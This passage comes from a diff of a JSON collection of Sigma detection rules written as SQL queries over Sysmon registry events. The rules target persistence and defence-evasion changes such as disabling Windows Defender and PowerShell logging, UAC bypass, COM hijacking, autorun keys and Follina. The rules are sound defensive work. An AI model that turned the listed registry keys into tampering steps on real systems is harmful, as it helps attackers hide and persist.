'\\')) AND NOT ((Details = '(Empty)') OR (Details = '{807583E5-5146-11D5-A672-00B0D022E945}') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\drvinst.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\lnkfile\\\\shellex\\\\ContextMenuHandlers\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\PendingFileRenameOperations%' ESCAPE '\\') AND ((Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\regedit.exe' ESCAPE '\\')))" ], - "filename": "registry_set_asep_reg_keys_modification_classes.yml" + "filename": "registry_set_susp_pendingfilerenameoperations.yml" }, { - "title": "Execution DLL of Choice Using WAB.EXE", - "id": "fc014922-5def-4da9-a0fc-28c973f41bfb", + "title": "Registry Hide Function from User", + "id": "5a93eb65-dffa-4543-b761-94aa60098fb6", "status": "test", - "description": "This rule detects that the path to the DLL written in the registry is different from the default one. 
Launched WAB.exe tries to load the DLL from Registry.", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate admin script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\WAB\\\\DLLPath' ESCAPE '\\') AND NOT (Details LIKE '\\%CommonProgramFiles\\%\\\\System\\\\wab32.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideClock' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAHealth' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCANetwork' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAPower' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAVolume' ESCAPE '\\') AND Details = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowInfoTip' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowCompColor' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')))" ], - "filename": "registry_set_wab_dllpath_reg_change.yml" + "filename": 
"registry_set_hide_function_user.yml" }, { - "title": "Service Binary in Uncommon Folder", - "id": "277dc340-0540-42e7-8efb-5ff460045e07", + "title": "Disable Internal Tools or Feature in Registry", + "id": "e2482f8d-3443-4237-b906-cc145d87a076", "status": "experimental", - "description": "Detect the creation of a service with a service binary located in a uncommon directory", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate admin script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\') AND Details IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (Details LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\AppData\\\\Roaming\\\\Zoom%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Zoom%' ESCAPE '\\') OR (Details LIKE '%\\\\AppData\\\\Roaming\\\\Zoom%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Zoom%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND (TargetObject LIKE 
'%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableRegistryTools' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\DisableCMD' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableTaskmgr' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\Explorer\\\\DisableNotificationCenter' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableChangePassword' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableLockWorkstation' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\StartMenuLogOff' ESCAPE '\\') AND Details = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\shutdownwithoutlogon' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\ConsentPromptBehaviorAdmin' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\PushNotifications\\\\ToastEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Storage\\\\Write Protection' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\StorageDevicePolicies\\\\WriteProtect' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')))" ], - "filename": "registry_set_creation_service_uncommon_folder.yml" + "filename": "registry_set_disable_function_user.yml" }, { - "title": "Add Debugger Entry To Hangs Key For Persistence", - "id": "833ef470-fa01-4631-a79b-6f291c9ac498", + "title": "Suspicious Set Value of MSDT in Registry (CVE-2022-30190)", + "id": "2d9403d5-7927-46b7-8216-37ab7c9ec5e3", + "status": "test", + "description": 
"Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190.", + "author": "Sittikorn S", + "tags": [ + "attack.defense_evasion", + "attack.t1221" + ], + "falsepositives": [ + "Unknown" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKCR\\\\ms-msdt\\\\%' ESCAPE '\\')" + ], + "filename": "registry_set_cve_2022_30190_msdt_follina.yml" + }, + { + "title": "Potential Persistence Via CHM Helper DLL", + "id": "976dd1f2-a484-45ec-aa1d-0e87e882262b", "status": "experimental", - "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes", + "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.persistence" ], "falsepositives": [ - "This value is not set by default but could be rarly used by administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\Hangs\\\\Debugger%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\'))" ], - "filename": "registry_set_hangs_debugger_persistence.yml" + "filename": "registry_set_persistence_chm.yml" }, { "title": "New DNS ServerLevelPluginDll Installed", 
@@ -33355,190 +33108,186 @@ "filename": "registry_set_dns_server_level_plugin_dll.yml" }, { - "title": "Hiding User Account Via SpecialAccounts Registry Key", - "id": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", - "status": "test", - "description": "Detects modifications to the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" where the value is set to \"0\" in order to hide user account from being listed on the logon screen.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "title": "Common Autorun Keys Modification", + "id": "f59c3faf-50f3-464b-9f4c-1b67ab512d99", + "status": "experimental", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name)", "tags": [ - "attack.defense_evasion", - "attack.t1564.002" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows CE Services\\\\AutoStart%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Command Processor\\\\Autorun%' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnDisconnect%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnConnect%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\Setup\\\\CmdLine%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Ctf\\\\LangBarAddin%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Command Processor\\\\Autorun%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Protocols\\\\Handler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Protocols\\\\Filter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Htmlfile\\\\Shell\\\\Open\\\\Command\\\\(Default)%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Environment\\\\UserInitMprLogonScript%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\Control Panel\\\\Desktop\\\\Scrnsave.exe%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\UrlSearchHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Desktop\\\\Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Classes\\\\Clsid\\\\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\\\\Inprocserver32%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\Scrnsave.exe%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR ((TargetObject LIKE '%\\\\Office\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Classes\\\\PROTOCOLS\\\\Handler\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ClickToRunStore\\\\HKMU\\\\SOFTWARE\\\\Classes\\\\PROTOCOLS\\\\Handler\\\\%' ESCAPE '\\') OR Details IN ('{314111c7-a502-11d2-bbca-00c04f8ec294}', '{3459B272-CC19-4448-86C9-DDC3B4B2FAD3}', 
'{42089D2D-912D-4018-9087-2B87803E93FB}', '{5504BE45-A83B-4808-900A-3A5C36E7F77A}', '{807583E5-5146-11D5-A672-00B0D022E945}')) OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{8A69D345-D564-463c-AFF1-A69D9E530F96}%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{9459C573-B17A-45AE-9F64-1857B5D58CEE}%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{89820200-ECBD-11cf-8B85-00AA005B4383}%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" ], - "filename": "registry_set_special_accounts.yml" + "filename": "registry_set_asep_reg_keys_modification_common.yml" }, { - "title": "ETW Logging Disabled For rpcrt4.dll", - "id": "90f342e1-1aaa-4e43-b092-39fda57ed11e", + "title": "Potential Persistence Via COM Search Order Hijacking", + "id": "a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12", "status": "experimental", - "description": "Detects changes to the \"ExtErrorInformation\" key in order to disable ETW logging for rpcrt4.dll", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential COM object hijacking leveraging the COM Search Order", + "author": "Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien", "tags": [ - "attack.defense_evasion", - "attack.t1112", - "attack.t1562" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Unknown" + "Some installed utilities (i.e. 
OneDrive) may serve new COM objects at user-level" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\Rpc\\\\ExtErrorInformation' ESCAPE '\\' AND Details IN ('DWORD (0x00000000)', 'DWORD (0x00000002)'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\') AND NOT (((Details LIKE '%\\%\\%systemroot\\%\\%\\\\system32\\\\%' ESCAPE '\\' OR Details LIKE '%\\%\\%systemroot\\%\\%\\\\SysWow64\\\\%' ESCAPE '\\')) OR ((Details LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\FileCoAuthLib64.dll%' ESCAPE '\\' OR Details LIKE '%\\\\FileSyncShell64.dll%' ESCAPE '\\' OR Details LIKE '%\\\\FileSyncApi64.dll%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\SecurityHealthService.exe' ESCAPE '\\') OR (Details LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\TeamsMeetingAddin\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\Microsoft.Teams.AddinLoader.dll%' ESCAPE '\\') OR (Details LIKE '%\\\\AppData\\\\Roaming\\\\Dropbox\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\DropboxExt64.%.dll%' ESCAPE '\\') OR (Details LIKE '%TmopIEPlg.dll' ESCAPE '\\') OR ((Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wuauclt.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (Details LIKE '%\\\\FileRepository\\\\nvmdi.inf%' ESCAPE '\\') OR (Image LIKE 
'%\\\\MicrosoftEdgeUpdateComRegisterShell64.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\SYSTEM32\\\\dxdiag.exe' ESCAPE '\\') OR ((Details LIKE 'C:\\\\Windows\\\\pyshellext.amd64.dll' ESCAPE '\\' OR Details LIKE 'C:\\\\Windows\\\\pyshellext.dll' ESCAPE '\\')) OR ((Details LIKE 'C:\\\\Windows\\\\system32\\\\dnssdX.dll' ESCAPE '\\' OR Details LIKE 'C:\\\\Windows\\\\SysWOW64\\\\dnssdX.dll' ESCAPE '\\')) OR (Details LIKE 'C:\\\\Windows\\\\system32\\\\spool\\\\drivers\\\\x64\\\\3\\\\PrintConfig.dll' ESCAPE '\\') OR ((Details LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (Details LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\%' ESCAPE '\\') OR (Details LIKE '%C:\\\\WINDOWS\\\\system32\\\\GamingServicesProxy.dll%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND Details LIKE '%C:\\\\Windows\\\\System32\\\\Autopilot.dll%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\SecurityHealthService.exe' ESCAPE '\\' AND Details LIKE '%C:\\\\Windows\\\\System32\\\\SecurityHealth%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\regsvr32.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\InProcServer32\\\\(Default)' ESCAPE '\\')))" ], - "filename": "registry_set_rpcrt4_etw_tamper.yml" + "filename": "registry_set_persistence_search_order.yml" }, { - "title": "Disable Windows Defender Functionalities Via Registry Keys", - "id": "0eb46774-f1ab-4a74-8238-1155855f2263", + "title": "ScreenSaver Registry Key Set", + "id": "40b6e656-4e11-4c0c-8772-c1cc6dae34ce", "status": "experimental", - "description": "Detects when attackers or tools disable Windows Defender functionalities via the windows registry", - "author": "AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali", + "description": "Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl", + "author": 
"Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218.011" ], "falsepositives": [ - "Administrator actions" + "Legitimate use of screen saver" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\') AND (((TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableOnAccessProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableScanOnRealtimeEnable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Reporting\\\\DisableEnhancedNotifications' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\DisableBlockAtFirstSeen' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiSpyware' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiVirus' ESCAPE '\\') AND Details = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\SpyNet\\\\SpynetReporting' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\SubmitSamplesConsent' ESCAPE '\\' OR TargetObject LIKE '%\\\\MpEngine\\\\MpEnablePus' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\SCRNSAVE.EXE%' ESCAPE '\\' AND Details LIKE '%.scr' ESCAPE '\\') AND NOT ((Details LIKE '%C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" ], - "filename": "registry_set_windows_defender_tamper.yml" + "filename": 
"registry_set_scr_file_executed_by_rundll32.yml" }, { - "title": "PowerShell as a Service in Registry", - "id": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", - "status": "test", - "description": "Detects that a powershell code is written to the registry as a service.", - "author": "oscd.community, Natalia Shornikova", + "title": "PowerShell Logging Disabled Via Registry Key Tampering", + "id": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", + "status": "experimental", + "description": "Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (Details LIKE '%powershell%' ESCAPE '\\' OR Details LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\PowerShell\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\PowerShellCore\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\ModuleLogging\\\\EnableModuleLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockInvocationLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableTranscripting' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableInvocationHeader' ESCAPE '\\' OR TargetObject LIKE '%\\\\EnableScripts' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" ], - "filename": 
"registry_set_powershell_as_service.yml" + "filename": "registry_set_powershell_logging_disabled.yml" }, { - "title": "Outlook Macro Execution Without Warning Setting Enabled", - "id": "e3b50fa5-3c3f-444e-937b-0a99d33731cd", - "status": "test", - "description": "Detects the modification of Outlook security setting to allow unprompted execution of macros.", - "author": "@ScoubiMtl", + "title": "Allow RDP Remote Assistance Feature", + "id": "37b437cf-3fc5-4c8e-9c94-1d7c9aff842b", + "status": "experimental", + "description": "Detect enable rdp feature to allow specific user to rdp connect on the targeted machine", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Legitimate use of the feature (alerts should be investigated either way)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\Level' ESCAPE '\\' AND Details LIKE '%0x00000001%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\fAllowToGetHelp' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "registry_set_office_outlook_enable_macro_execution.yml" + "filename": "registry_set_allow_rdp_remote_assistance_feature.yml" }, { - "title": "Bypass UAC Using DelegateExecute", - "id": "46dd5308-4572-4d12-aa43-8938f0184d4f", - "status": "test", - "description": "Bypasses User Account Control using a fileless method", + "title": "Potential Persistence Using DebugPath", + "id": "df4dc653-1029-47ba-8231-3c44238cc0ae", + "status": "experimental", + "description": "Detects potential 
persistence using Appx DebugPath", "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\' AND Details = '(Empty)')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ActivatableClasses\\\\Package\\\\Microsoft.%' ESCAPE '\\' AND TargetObject LIKE '%\\\\DebugPath' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\PackagedAppXDebug\\\\Microsoft.%' ESCAPE '\\' AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\')))" ], - "filename": "registry_set_bypass_uac_using_delegateexecute.yml" + "filename": "registry_set_persistence_appx_debugger.yml" }, { - "title": "CurrentVersion NT Autorun Keys Modification", - "id": "cbf93e5d-ca6c-4722-8bea-e9119007c248", + "title": "Potential Persistence Via Outlook Today Pages", + "id": "487bb375-12ef-41f6-baae-c6a1572b4dd1", "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detects potential persistence activity via outlook today pages. 
